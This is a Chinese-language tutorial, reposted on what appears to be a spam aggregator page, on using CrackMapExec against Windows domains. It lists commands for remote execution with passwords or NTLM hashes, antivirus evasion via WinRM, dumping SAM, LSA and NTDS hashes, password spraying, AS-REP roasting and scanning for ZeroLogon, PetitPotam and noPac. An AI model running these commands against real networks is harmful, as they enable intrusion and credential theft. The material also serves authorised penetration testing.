当前位置: 首页 > news >正文

纯代码wordpress底部悬浮菜单合肥网站推广优化

纯代码wordpress底部悬浮菜单,合肥网站推广优化,怎么举报app软件,微信网站建设费用提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、CrackMapExec 是什么?二、简单使用1、获取帮助信息2、smb连接执行命令3、使用winrm执行命令(躲避杀软)4、smb 协议常用枚…

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、CrackMapExec 是什么?
  • 二、简单使用
    • 1、获取帮助信息
    • 2、smb连接执行命令
    • 3、使用winrm执行命令(躲避杀软)
    • 4、smb 协议常用枚举功能:
    • 5、获取凭证 dump hash
    • 6、导出域ntds
    • 7、密码喷晒
    • 8、文件上传、下载
    • 9、检测主机上是否运行spooler、 webdav 服务
    • 10、枚举域用户
    • 11、ASREPRoast
    • 12、查找非约束委派账户
    • 13、检测ESC8(adcs)漏洞利用
    • 14、通过活动目录收集子网段信息
    • 15、查看具有DCsync权限用户
    • 16、收集bloodhound 信息
    • 17、通过RDP协议屏幕截图
    • 18、扫描zerologo、petitpotam、nopac漏洞


前言

最近接触到了这款CrackMapExec 域渗透工具,目前使用感觉是挺不错了,在阅读了该工具在wiki的使用说明之后把一些平时域中需要常用到的命令学习记录了下来。

一、CrackMapExec 是什么?

CrackMapExec 也简称cme ,是一款内网域渗透的工具,可以对域进行信息收集或者一些常见域漏洞的探测。

二、简单使用

1、获取帮助信息

CrackMapExec  -h 获取帮助信息

可以看到支持使用哪些协议

在这里插入图片描述
通过使用指定的协议可以获取进一步的帮助信息

CrackMapExec smb -h 

在这里插入图片描述

2、smb连接执行命令

-x 通过cmd.exe 执行命令
-X 通过cmd.exe 调用执行powershell命令
crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'
或者使用ntlm hash
crackmapexec smb 192.168.216.144 -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356' -x 'whoami'
默认情况下会自动选择登录域,-d可以指定域登录,-x 要执行的命令
CME将按以下顺序执行命令
1.wmiexec:通过WMI执行命令
2.atexe:通过Windows任务调度程序调度任务来执行命令
3.smbexec:通过创建和运行服务来执行命令-X '$PSVersionTable' 使用查看powershell 版本环境命令 ,--amsi-bypass /path/payload 执行powershell

3、使用winrm执行命令(躲避杀软)

身份验证成功时将显示(Pwn3d!)

通过winrm执行命令很多情况下可以绕过一些杀软的拦截

crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!' -x 'whoami'

在这里插入图片描述

4、smb 协议常用枚举功能:

crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups  枚举域组crackmapexec smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt   枚举不需要smb签名的主机crackmapexec smb <ip> -u user -p pass -M enum_av   枚举主机上的杀软crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!'  --shares 列出共享 crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --sessions 枚举有效sessionscrackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --disks  列出磁盘crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --loggedon-users 枚举登录用户crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --users 枚举域用户crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --rid-brute  通过爆破RID枚举用户crackmapexec smb 192.168.216.144 -u 'test' -p 'ppt1234!' --pass-pol 获取域密码策略crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth 验证本地用户,并且测试登录

5、获取凭证 dump hash

当获取到高权限的用户可以使用–sam ,–lsa dump hash

crackmapexec wimri 192.168.216.144 -u 'administrator' -p 'pass1234!'  --sam/--lsa

在这里插入图片描述

6、导出域ntds

crackmapexec smb 192.168.216.144 -u 'administrator' -p 'pass1234!' --ntds

在这里插入图片描述

7、密码喷晒

crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18   多个用户,一个密码进行喷晒
crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18    使用users.txt 用户列表文件指定多用户喷晒
crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt   爆破administrator用户密码

8、文件上传、下载

上传/tmp/whoami.txt 文件到 目标主机 \Windows\Temp\whoami.txt
–put-file

cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt   上传文件

文件下载
–get-file

cme smb 172.16.251.152 -u user -p pass --get-file  \\Windows\\Temp\\whoami.txt /tmp/whoami.txt    下载文件

9、检测主机上是否运行spooler、 webdav 服务

crackmapexec smb <ip> -u 'user' -p 'pass' -M spooler  查看打印机服务
crackmapexec smb <ip> -u 'user' -p 'pass' -M webdav   查看webdav服务

10、枚举域用户

cme ldap 192.168.1.0/24 -u users.txt -p '' -k  

11、ASREPRoast

查找不需要 Kerberos 预身份验证的用户查找不需要 Kerberos 预身份验证的用户
没有已知域用户密码的情况下:

cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

在拥有域内用户权限的情况下

cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt

12、查找非约束委派账户

cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation

13、检测ESC8(adcs)漏洞利用

查看adcs服务器

crackmapexec run ldap <ip> -u user -p pass -M adcs

列出证书模板

crackmapexec run ldap <ip> -u user -p pass -M adcs -o SERVER-xxxx

14、通过活动目录收集子网段信息

crackmapexec ldap <ip> -u <user> -p <pass> -M get-network
crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ONLY_HOSTS=true
crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ALL=true

15、查看具有DCsync权限用户

crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync 

16、收集bloodhound 信息

crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All

17、通过RDP协议屏幕截图

crackmapexec rdp <ip> -u <user> -p <password> --screenshot --screentime 

18、扫描zerologo、petitpotam、nopac漏洞

crackmapexec smb <ip> -u '' -p '' -M zerologo
crackmapexec smb <ip> -u '' -p '' -M petitpotam
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac

还有其他协议的使用方法,在此没有列出

http://www.hkea.cn/news/407708/

相关文章:

  • 个人如何免费建网站seo在线优化工具 si
  • 双线主机可以做彩票网站吗网络推广合作协议
  • 做外贸的b2b网站域名批量查询系统
  • 建设网站需要哪些职位网站建设策划书
  • 苏州网站建设哪里好网站点击排名优化
  • 网站建设收费标准策划百度推广关键词越多越好吗
  • 网站怎么做更新吗如何建立网页
  • 国外建设工程招聘信息网站tool站长工具
  • 专业做相册书的网站电商网站建设制作
  • 银川网站开发公司电话东莞网
  • 环境保护局网站管理制度建设百度指数的主要功能有
  • 安装wordpress提示500错误关键词优化的策略有哪些
  • 企业网站建设公司排名深圳高端seo公司助力企业
  • 做网站套餐网站seo
  • 网站上的代码网页怎么做的下载百度软件
  • 网站功能模块建设搜狗推广
  • 网站做推广有用吗网站页面设计
  • 做简报的网站广州搜发网络科技有限公司
  • 南乐县住房和城乡建设局网站制作网站的步骤是什么
  • 金华做网站最专业的公司搜易网提供的技术服务
  • wordpress适合门户网站吗怎么营销自己的产品
  • 常用的网站类型有哪些seo优化专员编辑
  • 网站专题框架怎么做海阳seo排名
  • 手机网站代码下载黄页网站推广服务
  • 做网站前端多少钱在线bt种子
  • wordpress+模版+推荐专业网站seo推广
  • 浦项建设公司员工网站2023免费推广入口
  • 如何查询某个网站的设计公司最新推广注册app拿佣金
  • 八宝山做网站公司打广告
  • wordpress vip查看插件南宁seo费用服务